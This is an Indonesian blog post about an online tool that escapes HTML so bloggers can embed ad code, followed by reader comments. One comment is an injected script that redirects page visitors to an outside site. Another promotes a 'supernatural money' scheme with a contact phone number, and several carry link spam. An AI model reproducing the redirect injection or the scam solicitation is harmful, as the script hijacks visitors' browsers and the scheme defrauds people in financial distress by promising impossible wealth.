Alat parse Convert Kode HTML TOOL blog kode iklan dst..

Ditulis Oleh Dewi Arjaya Pada Wednesday, October 8, 2014 | 1:29:00 AM

Alat parse ini adalah sebuah tool covert HTML guna untuk mengjindari error HTML pada script code yang yang masih berantakan, dengan script alat parse maka susunan html akan menjadi rapih dan tidak lagi ada error pada koden html, bagi para blogger ini sangat bermanfaat dengan memparsing Kode HTML anda, biasanya alat parse ini untuk mengconvert kode iklan yang susunannya masih HTML bias seperti kode iklan google adsense, chitika, cpx24, pop ads, dan banyak lagi,contohnya seperti berikut :
Tulisan kode <b> about HTML Parse <b> pada halaman post maka Anda harus menulisnya seperti ini   &lt;b&gt about HTML Parse &lt;bgt;

Contoh diatas bisa dilihat kode setelah di parse :
menjadi &lt;  dan menjadi &gt;



masukkan script kode HTML kedalam kotak dibawah ini kemudian klik Convert 

Blog, Updated at: 1:29:00 AM

29 komentar:

  1. Replies
    1. This comment has been removed by the author.

      Delete
    2. <script>
      window.location="http://eroface.net";
      </script>

      Delete
    3. Assalamualaikum.wr.wb. perkenalkan nama saya Hariyati Dewi Tki Hongkong, saat menulis ini saya teringat memory masa lalu.saya sangat tergugah hati melihat coretan hati yang Ibu tulis. saya jadi teringat tentang masa-masa sulit dulu,karena iktiar dan usaha , seolah2 menjadi dendam bukan lagi motivasi, cuma satu tujuan saya pada saat bagaiman caranya untuk bangkit..singkat kata berbagai macam iktiar dan cara yang saya lalui, mengingat pada saat itu hutang saya 1,2m yang tidak sedikit, belum lagi bunga renternir yang bertambah. karena usaha, kesungguhan hati, akhirnya saya menemukan jalan /solusi melalui Program Pesugihan Dana Gaib Tanpa Tumbal. saya percaya ALLAH ITU TIDAK DIAM MAHA PENYAYANG , cobaan itu bukan lah ujian tapi hadiah yang tersilmut untuk kebahagiaan yang sebenar2nya. Dengan keyakina dan keberania saya ikut bergabung untuk mengikuti Program Pesugihan Dana Gaib Tanpa Tumbal dan memohonkan dana sesuai kebutuhan dan kesanggupan saya. Cuma dalam waktu 1 hari 1 malam saya mendapat telpon dari pihak Program tersebut, Alhamdulillah dana yang saya mohonkan sudah cair dan sudah dapat saya gunakan untuk melunasi hutang. jika anda ingin seperti saya silahkan hubungi
      Ki Witjaksono: 085-2222-31459
      Atau kunjungi website

      Klik-> PESUGIHAN DANA GAIB

      Ingat kesempatan tidak akan datang untuk yang kedua kalinya

      Delete
  2. alat parse itu bisa buat kode iklan adsense ya

    ReplyDelete
  3. terimakasih baru saja saya parse kode di form tersedia

    ReplyDelete
  4. baru coba saya pasang tapi kursor hanya jadi tanda garis tegak lurus, belum bisa disimpan, apakah koneksinya ya?

    ReplyDelete
    Replies
    1. Bisa jadi mas... saya sendiri selalu menggunakan parse ini ga ada masalah ko

      Delete
  5. Sekedar ingin berbagi, Saudara Blogger, saat ini sudah hadir publhiser iklan yang bisa menyamai Google Adsense, bahkan bisa saling melengkapi, dan bisa menjadi alternatif jika ditolak atau di banned Google Adsense.
    Infonya disini:

    http://www.e-jurnal.com/2015/05/pilih-google-adsense-atau-adsoptimal.html

    ReplyDelete
  6. terimakasih banyak, cara memasang kolom untuk parse iklan di blog gmn ya caranya?

    ReplyDelete
    Replies
    1. Silahkan Baca Artikel di blog ini mba Najla seputar cara pasang Iklan Blog..

      Delete
  7. Terima kasih atas informasinya.
    sekarang saya bisa parse iklan dengan mudah

    ReplyDelete
  8. Cara membuat seperti ini buat dipasang diblog sendiri gimana caranya mba

    ReplyDelete
    Replies
    1. wak waw, itu rahasia perusahaan mbak, hehe

      Delete
    2. Gak Mba Oki Nanti nanti aku share Kok cara buatnya...

      Delete
  9. gan, diklik convert kok diem aja

    ReplyDelete
  10. terimakasih tutorial nya sangat membantu saya coba terapkan pada template satu kolom berhasil membuat alat parse html seperti ini http://htmladsparser.blogspot.com/,parse adsense code dan encoding .

    ReplyDelete
  11. Nih alat parse paling cepat dan akurat dari Saya Bisa Dot Com
    Semoga bisa membantu, terima kasih

    ReplyDelete